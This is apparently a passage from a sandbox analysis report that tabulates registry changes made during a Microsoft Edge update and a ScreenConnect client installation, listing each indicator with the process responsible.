| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29} | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppName = "ie_to_edge_stub.exe" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\Policy = "3" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Main\EnterpriseMode | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\ = "IEToEdge Handler" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\ = "IEToEdge Handler" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppName = "ie_to_edge_stub.exe" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\Policy = "3" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppPath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\BHO" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EdgeIntegration\AdapterLocations | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EdgeIntegration | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29} | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\EdgeIntegration\AdapterLocations\C:\Program Files (x86)\Microsoft\Edge\Application = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\EnterpriseMode\MSEdgePath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\28 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\29 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28 | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2A | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2d | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133839716223694434" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2F\52C64B7E | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\30 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2B | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\32 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\32\52C64B7E | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2C | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\30 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\29 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge\InstallerPinned = "0" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\27 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2c | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2f | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\32\52C64B7E\@%systemroot%\system32\FirewallControlPanel.dll,-12122 = "Windows Defender Firewall" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2b | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2E | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2D | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2f | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\31 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\31 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2e | C:\Windows\system32\msiexec.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Classes\AppID\{1FCBE96C-1697-43AF-9140-2897C7C69767} | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C9C2B807-7731-4F34-81B7-44FF7779522B}\TypeLib\Version = "1.0" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\594E83E3B144E17B918A56C8188C0B21\SourceList | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\sc-e9736d81e38965d1 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-0D32-6986436855F3}\InprocServer32 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{628ACE20-B77A-456F-A88D-547DB6CEEDD5}\LocalServer32\ServerExecutable = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\notification_helper.exe" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\Implemented Categories\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/pdf\Extension = ".pdf" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgeHTM\ = "Microsoft Edge HTML Document" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\594E83E3B144E17B918A56C8188C0B21\ProductIcon = "C:\\Windows\\Installer\\{3E38E495-441B-B71E-19A8-658C81C8B012}\\DefaultIcon" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\594E83E3B144E17B918A56C8188C0B21\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-0D32-6986436855F3} | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\TypeLib\{C9C2B807-7731-4F34-81B7-44FF7779522B}\1.0\0\win32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ie_to_edge_bho.IEToEdgeBHO\CLSID\ = "{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ie_to_edge_bho.IEToEdgeBHO.1\CLSID\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E}\InProcServer32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\MSEdgeHTM\DefaultIcon | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\sc-e9736d81e38965d1 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\066BF637963EA270D7C47FABD896ABE4\SourceList\Media\1 = ";" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\AppID\{628ACE20-B77A-456F-A88D-547DB6CEEDD5} | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C9C2B807-7731-4F34-81B7-44FF7779522B}\ = "Interface {C9C2B807-7731-4F34-81B7-44FF7779522B}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgeHTM\Application\AppUserModelId = "MSEdge" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\MSEdgeMHT\shell\open | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\.shtml | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.svg\OpenWithProgIds\MSEdgeHTM | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-0D32-6986436855F3}\InprocServer32 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E}\InProcServer32\ThreadingModel = "Apartment" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\MSEdgePDF\Application | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgeHTM\shell\open\command\ = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --single-argument %1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\670477F90DC6EA60B24E65EDB2E83A5E\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\TypeLib\{C9C2B807-7731-4F34-81B7-44FF7779522B}\1.0 | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ie_to_edge_bho.IEToEdgeBHO.1 | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E}\AppID = "{6d2b5079-2f0b-48dd-ab7f-97cec514d30b}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\.html | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\594E83E3B144E17B918A56C8188C0B21\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\e9736d81e38965d1\\" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1A8704ED27DC1CF810A5B9C83F159194\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
